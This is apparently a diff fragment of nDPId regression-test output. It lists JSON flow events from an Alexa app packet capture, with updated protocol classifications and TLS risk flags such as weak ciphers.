-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00932{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 